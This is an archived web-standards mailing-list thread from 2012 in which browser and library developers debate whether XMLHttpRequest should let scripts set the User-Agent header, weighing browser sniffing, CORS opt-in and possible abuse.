 just contact the backend's maintainer and have them fix this server-side
 problem... well... server-side.


 This isn't feasible. There's a whole web out there filled with legacy
 content that relies on finding the string "Mozilla" or "Netscape", for
 example. See also the requirements for navigator.appName,
 navigator.appVersion, document.all, etc. You can't even get close to
 cleaning up the mess of legacy code out there, so you work around it. And
 history repeats itself today with magical strings like "Webkit" and
 "Chrome".

 What of new browsers, how do they deal with this legacy content? The same
 way that current ones do, most likely -- by pretending to be something else.


The problem is that the same reasoning can be made regarding CORS. We have
backends, today, that do not support it. I'm not convinced they actually
want to prevent Cross-Domain requests that come from the browser. Truth is
it depends on the backend. So why do we require server opt-in when it comes
to CORS? After all, it is just a limitation in the browser itself. Surely
there shouldn't be any issue given these URLs are already fetchable from a
browser provided the page origin is the same. You can even fetch them using
another backend or shell or whatever other means.

The problem is that backends expect this limitation to hold. So very few
actually check anything, because browsers on a page from another origin are
never supposed to request the backend. There is potential for abuse here.
The solution was to add an opt-in system. For backends that are not maintained,
behaviour is unchanged. Those that want to support CORS have to say so
explicitly.

If we had a mechanism to do the same thing for modifying the User-Agent
header, I wouldn't even discuss the issue. The target URL authorizes
User-Agent to be changed, the browser accepts the custom User-Agent, sends
the request, and filtering that happened between the URL and the browser
would be bypassed (solving the problem Hallvord gave with devs working on a
part of a site and having to deal with some filtering above their heads).
It could work pretty much exactly like CORS custom headers are handled (see
the sketch below). Hell, it could even be made generic and could potentially
solve other issues.
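
(Under such a mechanism, the exchange could look like CORS preflight for any
other non-simple header. A sketch with a hypothetical URL; no such opt-in
for User-Agent is actually specified:)

var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://api.example.com/resource'); // hypothetical URL
// As with other non-simple headers under CORS, this would trigger a
// preflight: an OPTIONS request carrying
// "Access-Control-Request-Headers: User-Agent", and the custom value would
// only be sent if the server answered with
// "Access-Control-Allow-Headers: User-Agent".
xhr.setRequestHeader('User-Agent', 'MyAggregator/1.0');
xhr.send();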

What's proposed here is entirely different though: it's an all or nothing
approach. Now I'm just trying to see if there is no potential danger here.


 aside

  The burden of proof is on you. *You* ha


 Emphasis with asterisks seems unnecessary aggressive. Perhaps
 unintentionally so. :)
 /aside


Sorry about that, not my intention at all. I'd love to be convinced and I'd
just love it if Hallvord (or anyone really) could actually pull it off. So
it's positive excitement, not negative one. I hope my answer above will
make my reasoning a bit clearer (just realized it wasn't quite clear
before).


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Julian Aubourg
 Are you really saying that backend developers want to use User-Agent to
 limit the number of requests accepted from Firefox?  (Not one user's
 Firefox, but all Firefox users, at least of a particular version,
 combined.)  That doesn't make sense at all.  If that's not what you mean,
 then please clarify, because I don't know any other way the User-Agent
 header could be used to limit requests.

A more likely scenario is a URL that only accepts a specific user agent
that is not a browser (a backend). If a user script can change the User-Agent,
it can request this URL repeatedly. Given it's in the browser, a shared
resource (like an ad provider or a CDN) becomes a very tempting point of
failure.

AFAIK, you don't have the same problem with PHP libs for instance (you
don't request them from a third-party server, which is what makes this a
potential vector of attack).

I'm not saying it's smart (both from the hacker's POV and the backend's POV)
but I'm just being careful and trying to see if there is potential for
abuse.

On 11 October 2012 16:22, Glenn Maynard gl...@zewt.org wrote:

 On Thu, Oct 11, 2012 at 8:09 AM, Julian Aubourg j...@ubourg.net wrote:

  I still don't fully understand the scenario(s) you have in mind.

 You're confusing the script's origin with the site's origin. XHR requests
 from within a script are issued with the origin of the page that the script
 is included into.

  Now, read back your example but suppose the attack is to be pulled
  against cnn.com. At a given time (say cnn.com's peak usage time), the
  script issues a gazillion requests. Bye-bye server.


 I'm confused.  What does this have to do with unblacklisting the
 User-Agent header?

 That's why I took the ad example. Hack a single point of failure (the ad
 server, a CDN) and you can DOS a site using the resource from network
 points all over the net. While the frontend dev is free to use scripts
 hosted on third-parties, the backend dev is free to add a (silly but
 effective) means to limit the number of requests accepted from a browser.
 Simple problem, simple solution and the spec makes it possible.


 Are you really saying that backend developers want to use User-Agent to
 limit the number of requests accepted from Firefox?  (Not one user's
 Firefox, but all Firefox users, at least of a particular version,
 combined.)  That doesn't make sense at all.  If that's not what you mean,
 then please clarify, because I don't know any other way the User-Agent
 header could be used to limit requests.

 --
 Glenn Maynard





Re: Fwd: [XHR] Open issue: allow setting User-Agent?

2012-10-11 Thread Boris Zbarsky

On 10/11/12 9:09 AM, Julian Aubourg wrote:

Did you ask backend devs why they white-listed browsers?


Yes.  Typically they don't have a good answer past "we felt like it", in 
my experience.  Particularly for the ones that will send you different 
content based on somewhat random parts of your UA string (like whether 
you're using an Irish Gaelic localized browser or not).



Did you try and educate them?


Yes.  With little success.


Did you ever encounter any sensible use-case for this?


For serving different content based on UA string?  Sure, though there 
are pretty few such use cases.


The question is whether it should be possible to spoof the UA to get the 
other set of content.  For example, if I _am_ using an Irish Gaelic 
localized Firefox, should I still be able to get the content the site 
would send to every single other Firefox localization?  Seems like that 
might be desirable, especially because the site wasn't actually _trying_ 
to lock out Gaelic speakers; it just happens to not be very good at 
parsing UA strings.



You have to be very careful with breaking backward compatibility.


It's not clear to me how the ability to set the UA string breaks 
backwards compatibility, offhand.


-Boris



[XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Hallvord R. M. Steen

Should XHR allow scripts to set User-Agent?

Cons:
* The spec suggests the limitation helps ensure some data integrity
* Slight back-compat risks if we encounter scripts that attempt to set  
User-Agent on sites with backends that expect normal browser UA strings.  
This may sound far-fetched but some sites do fingerprint the browser by  
the value of various headers and use this fingerprint as a security  
measure.


Pros:
* We should try to avoid imposing limitations on scripts, except when  
careful reasoning suggests we need those limitations
* User-Agent is not a very useful header in the first place, backends  
should not rely on it
* Allowing it can help scripts work around broken backends that DO abuse  
User-Agent - particularly useful with CORS, where one might want to get  
data from a site that allows cross-origin usage but has backend browser  
sniffing/blocking
* Conceptually, a JavaScript making HTTP requests can also claim to be  
acting on behalf of the user, being the user's Agent.


Personally I'm strongly in favour of removing User-Agent from the list of  
prohibited headers. As an author I've experienced problems I could not  
solve due to this limitation.


--
Hallvord R. M. Steen
Core tester, Opera Software



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Hallvord R. M. Steen

Julian Aubourg j...@ubourg.net wrote Tue, 09 Oct 2012 15:32:42 +0200


I agree the use cases do not seem compelling. But I know I'm generally
surprised by what people can and will do. What problem did you encounter
that would have necessitated to change the User-Agent string, Hallvord?


I've had trouble writing extensions and user scripts to work around  
backend sniffing, due to being unable to simply set User-Agent for a  
specific script-initiated request and get the correct content. As I've  
attempted to explain to Anne, I think this experience is relevant to  
scripts using CORS, because they also want to interact with backends the  
script author(s) don't choose or control.


Interacting, in a sane way, with a backend that does browser sniffing is a  
*very* compelling use case to me.



Just think what a
malicious script could do to browser usage statistics


The changed User-Agent will of course only be sent with the requests  
initiated by the script, all other requests sent from the browser will be  
normal. Hence, the information loss will IMO be minimal and probably have  
no real-world impact on browser stats.



Also, there actually
are security concerns. While I trust open-source browsers (and mainstream
close-source ones) not to try and trick servers into malicious  
operations,

I can't say the same for the whole web, especially malicious ad scripts.


If your backend really relies on User-Agent header values to avoid being  
tricked into malicious operations you should take your site offline for  
a while and fix that ;-). Any malicious Perl/PHP/Ruby/Shell script a  
hacker or script kiddie might try to use against your site can already  
fake User-Agent.


A malicious ad script would presumably currently have the user's web  
browser's User-Agent sent with any requests it would make to your site, so  
unless you want to guard yourself from users running  
HackedMaliciousEvilWebBrowser 1.0 I don't see what protection you would  
lose from allowing XHR-set User-Agent.


--
Hallvord R. M. Steen
Core tester, Opera Software



Re: [XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Jarred Nicholls
On Tue, Oct 9, 2012 at 9:29 AM, Hallvord R. M. Steen hallv...@opera.com wrote:

 Anne van Kesteren ann...@annevk.nl wrote Tue, 09 Oct 2012 15:13:00
 +0200


  it was once stated that allowing full control would be a security risk.


 I don't think this argument has really been substantiated for the
 User-Agent header. I don't really see what security problems setting
 User-Agent can cause.

 (To be honest, I think the list of disallowed headers in the current spec
 was something we copied from Macromedia's policy for Flash without much
 debate for each item).


  (If you mean this would help you from browser.js or similar such
 scripts I would lobby for making exceptions there, rather than for the
 whole web.)


 Well, browser.js and user scripts *is* one use case but I fully agree that
 those are special cases that should not guide spec development.

 However, if you consider the CORS angle you'll see that scripts out there
 are already being written to interact with another site's backend, and such
 scripts may face the same challenges as a user script or extension using
 XHR including backend sniffing. That's why experience from user.js
 development is now relevant for general web tech, and why I'm making this
 argument.


 --
 Hallvord R. M. Steen
 Core tester, Opera Software


I agree with Hallvord, I cannot think of any additional *real* security
risk involved with setting the User-Agent header.  Particularly in a CORS
situation, the server-side will (should) already be authenticating the
origin and request headers accordingly.  If there truly is a compelling
case for a server to only serve to Browser XYZ that is within scope of the
open web platform, I'd really like to hear that.

Jarred


Re: [XHR] Open issue: allow setting User-Agent?

2012-10-09 Thread Hallvord R. M. Steen

Julian Aubourg j...@ubourg.net wrote Tue, 09 Oct 2012 16:34:08 +0200


I've had trouble writing extensions and user scripts to work around

backend sniffing, due to being unable to simply set User-Agent for a
specific script-initiated request and get the correct content. As I've
attempted to explain to Anne, I think this experience is relevant to
scripts using CORS, because they also want to interact with backends the
script author(s) don't choose or control.


 If the backend sniffs out (all or some) browsers, it's the backend's
choice.


We end up in a philosophical disagreement here :-) I'd say that whatever  
browser the user decides to use is the user's choice and the server should  
respect that.



CORS has been specified so that you NEED a cooperative backend.
Unlock a header and some other means to sniff you out will be found and
used :/


Anne van Kesteren also makes a similar point, so I'll respond to both:


If you consider CORS you also need to consider that if we allow
developers to set user-agent a preflight request would be required for
that header (and the server would need to allow it to be custom). So
it's not quite that simple and would not actually help.


One word: legacy. For example Amazon.com might want to enable CORS for  
some of its content. The team that will do that won't necessarily have any  
intention of blocking browsers, but will very likely be unaware of the  
widespread browser sniffing in other parts of the Amazon backend. (With  
sites of Amazon's or eBay's scale, there is in my experience simply no  
single person who is aware of all browser detection and policies). Hence,  
there is IMO non-negligible risk that a large web service will be  
cooperative on CORS but still shoot itself in the foot with browser  
sniffing.


If I write, say, a CORS content aggregator, I would want it to run in all  
browsers, not only those allowed by the content providers. And I'd want to  
be in control of that. Hence, in my view this issue is mostly a trade-off  
between something script authors may need and more theoretical purity  
concerns.



The changed User-Agent will of course only be sent with the requests
initiated by the script, all other requests sent from the browser will  
be normal. Hence, the information loss will IMO be minimal and probably  
have no real-world impact on browser stats.



var XHR = window.XMLHttpRequest;

window.XMLHttpRequest = function() {
    var xhr = new XHR(),
        send = xhr.send;
    xhr.send = function() {
        xhr.setRequestHeader( "User-Agent", "OHHAI!" );
        return send.apply( this, arguments );
    };
    return xhr;
};


Yes, this could give a generic library like jQuery less control of the  
contents of *its* request. However, there will still be plenty of requests  
not sent through XHR - the browser's main GET or POST for the actual page  
contents, all external files loaded with SCRIPT, LINK, IMG, IFRAME, EMBED  
or OBJECT, all images from CSS styling etc. Hence I still believe the  
information loss and effect on stats will be minimal.


Also, the above could be a feature if I'm working on extending a site  
where I don't actually fully control the backend - think a CMS I'm forced  
to use and have to work around bugs in even if that means messing with how  
jQuery sends its requests ;-).


If your backend really relies on User-Agent header values to avoid  
being
tricked into malicious operations you should take your site offline  
for a
while and fix that ;-). Any malicious Perl/PHP/Ruby/Shell script a  
hacker

or script kiddie might try to use against your site can already fake
User-Agent



Oh, I agree entirely. Except checking User-Agent is a quick and painless
means to protect against malicious JavaScript scripts. I don't like the
approach any more than you do, but we both know it's used in the wild.


I'm afraid I don't know how this is used in the wild and don't fully  
understand your concerns. Unless you mean we should protect dodgy SEO  
tactics sending full site contents to Google bot UAs but a paywall block  
to anyone else from user-applied scripts trying to work around that?



A malicious ad script would presumably currently have the user's web
browser's User-Agent sent with any requests it would make



The malicious script can trick the server into accepting a request the
backend expects to be able to filter out by checking a header which the
standard says is set by the browser and cannot be changed by user  
scripts.

Think painless DOS with a simple piece of javascript.


I still don't fully understand the scenario(s) you have in mind.

For a DOS attack you'd be launching it against some third-party site (it  
doesn't make sense for a site to DOS itself, right?). Trying to understand  
this, here are my assumptions:


* The threat scenario is trying to DOS victim.example.com by getting a  
malicious javascript targetting this site to run on cnn.com or some  
similar high-volume site. (The attacker presumably